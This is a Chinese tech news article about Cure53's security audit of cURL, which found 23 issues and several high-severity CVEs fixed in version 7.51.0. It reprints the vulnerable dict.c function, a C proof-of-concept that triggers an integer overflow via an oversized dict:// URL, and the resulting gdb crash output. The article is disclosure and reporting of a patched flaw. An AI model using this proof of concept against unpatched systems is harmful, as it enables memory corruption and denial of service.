注意了,cURL的漏洞也不少

安全 漏洞
cURL想必大家都不陌生,它是一款开源的命令行工具和库,支持多种协议传输数据。cURL如今的应用还是比较广泛的,包括网络设备、打印机、智能手机,甚至是一些物联网设备比如汽车。

[[177943]]

安全专家对cURL进行了审计,发现了数十个安全问题,这些漏洞在最新的版本中已经被修复。

cURL想必大家都不陌生,它是一款开源的命令行工具和库,支持多种协议传输数据。cURL如今的应用还是比较广泛的,包括网络设备、打印机、智能手机,甚至是一些物联网设备比如汽车。

主动审计

前不久,cURL开发者、Mozilla员工Daniel Stenberg请Mozilla Secure Open Source(SOS)项目对cURL进行安全审计。

“我请Mozilla Secure Open Source项目进行了一次安全审计。这个项目是由Mozilla寻找第三方公司一起参与,并且最终买单完成的。参与审计的公司名为Cure53。” Stenberg在博客中写道。“我之所以申请审计是因为最近我感觉存在一些安全相关的问题,我觉得我们在安全方面可能有所欠缺,所以想让专家们检查一下。”

Cure53的5名专家对cURL进行了为期20天的审计,发现了总共23个安全问题。

审计结果

这些安全问题中,有9个是安全漏洞。专家融合了其中2个安全漏洞——其中一个被归类为“plain bug”,因为要在实际攻击场景进行利用会很困难。另外,审计发现了4个高危漏洞和4个中危漏洞。

高危漏洞的漏洞编号为CVE-2016-8617, CVE-2016-8619, CVE-2016-8622和CVE-2016-8623。这些都是远程执行漏洞。

比如说下面这个漏洞:

CRL-01-014 unescape_word()整型溢出造成负数数组索引(高危)

dict.c中的unescape_word()函数中存在以下代码:

  1. static char *unescape_word(struct Curl_easy *data, const char *inputbuff) 
  2.        { 
  3.          char *newp; 
  4.          char *dictp; 
  5.          char *ptr; 
  6.          int len; 
  7.          char ch; 
  8.          int olen=0; 
  9.          newp = curl_easy_unescape(data, inputbuff, 0, &len); 
  10.          if(!newp) 
  11. return NULL
  12.          dictp = malloc(((size_t)len)*2 + 1); /* add one for terminating zero */ 
  13.          if(dictp) { 
  14.            /* According to RFC2229 section 2.2, these letters need to be escaped with 
  15.               \[letter] */ 
  16.            for(ptr = newp; 
  17.                (ch = *ptr) != 0; 
  18.                ptr++) { 
  19.              if((ch <= 32) || (ch == 127) || 
  20.                  (ch == '\'') || (ch == '\"') || (ch == '\\')) { 
  21.                dictp[olen++] = '\\'
  22.              } 
  23.              dictp[olen++] = ch; 
  24.            } 
  25.            dictp[olen]=0; 
  26.          } 
  27. free(newp); 
  28.          return dictp; 
  29.        } 

很明显,len要比pow(2,31)小,但是输出可以拓展至两倍大小,也就是说当olen的值是INT_MAX时,可以被增加。这就会导致有符号整型溢出。

由于olen一直被用作数组索引,负的数组索引就会指向未分配的内存。

要验证漏洞,可以在6GB以上空闲内存的64位电脑上运行下面的代码。这个测试会获取一个超过1GB长的dict:// URL。

  1. #include <curl/curl.h> 
  2. #include <stdint.h> 
  3. #include <string.h> 
  4. #include <err.h> 
  5. #include <stdlib.h> 
  6. int main(int argc, char *argv[]) 
  7.   char *dicturl = malloc(23 + (1ULL<<30) + 5 + 1); 
  8.   if (!dicturl) 
  9.     errx(1, "malloc"); 
  10.   strcpy(dicturl, "dict://localhost/MATCH:"); 
  11.   memset(dicturl + 23, '\"', (1ULL<<30) + 5); 
  12.   dicturl[23 + (1ULL<<30) + 5] = '\0'
  13.   CURL *hnd = curl_easy_init(); 
  14.   curl_easy_setopt(hnd, CURLOPT_URL, dicturl); 
  15.   free(dicturl); 
  16.   curl_easy_setopt(hnd, CURLOPT_NOPROGRESS, 1L); 
  17.   CURLcode ret = curl_easy_perform(hnd); 
  18.   curl_easy_cleanup(hnd); 
  19.   return (int)ret; 

运行会导致如下的崩溃信息:

  1. $ gdb ./negative_dict_url 
  2. [...] 
  3. (gdb) run 
  4. Starting program: [...] 
  5. [...] 
  6. Program received signal SIGSEGV, Segmentation fault. 
  7. 0x00007ffff7b6975b in unescape_word (data=0x63a0b0, inputbuff=0x7fffb0fca017 '\"' <repeats 200 times>...) at dict.c:116 
  8. 116 dictp[olen++] = '\\'
  9. (gdb) x/1i $pc 
  10. => 0x7ffff7b6975b <unescape_word+170>: mov 
  11. (gdb) print/x $rax 
  12. $1 = 0x7ffdf0dba010 
  13. (gdb) print/x dictp 
  14. $2 = 0x7ffe70dba010 
  15. (gdb) print olen 
  16. $3 = -2147483647 

但实际上,审计报告提到,cURL库的整体安全性和鲁棒性都很好。

也请大家不要担心,新版本的cURL已经上线了,7.51.0版本修复了总共11个漏洞,其中7个是由Cure53的审计团队发现的,其他的漏洞是由Luật Nguyễn、Christian Heimes和Fernando Muñoz提交的。

Stenberg指出,cURL是一个非常常用的软件,因此,审计对用户来说具有重大意义。

“由于curl是世界上最常用的软件,因此curl如果出现了问题可能对各种工具、设备、应用造成重大影响。我们不希望发生那样的事。”

责任编辑:武晓燕 来源: FreeBuf
相关推荐

2021-12-26 19:04:51

漏洞Logback系统

2015-08-20 15:14:33

Android漏洞Stagefright漏洞修复

2020-12-08 12:18:09

安卓应用漏洞

2018-09-14 09:55:26

2010-08-31 15:18:31

2022-09-15 12:22:25

cookieDOS 漏洞网络攻击

2020-11-05 10:43:50

安全漏洞Github

2021-07-07 05:43:47

漏洞网络安全网络攻击

2022-06-20 13:34:46

漏洞网络攻击

2020-10-19 15:52:42

物联网漏洞IoT

2009-07-20 15:37:09

iBatis like注入漏洞

2023-10-10 22:27:42

2015-08-10 10:26:08

2016-01-27 14:30:20

2021-05-20 15:00:13

手机关机电池

2014-06-03 10:14:06

2010-09-01 13:37:32

2020-04-21 15:22:35

ChromeFirefox浏览器

2024-08-07 08:00:00

2015-08-05 13:54:08

点赞
收藏

51CTO技术栈公众号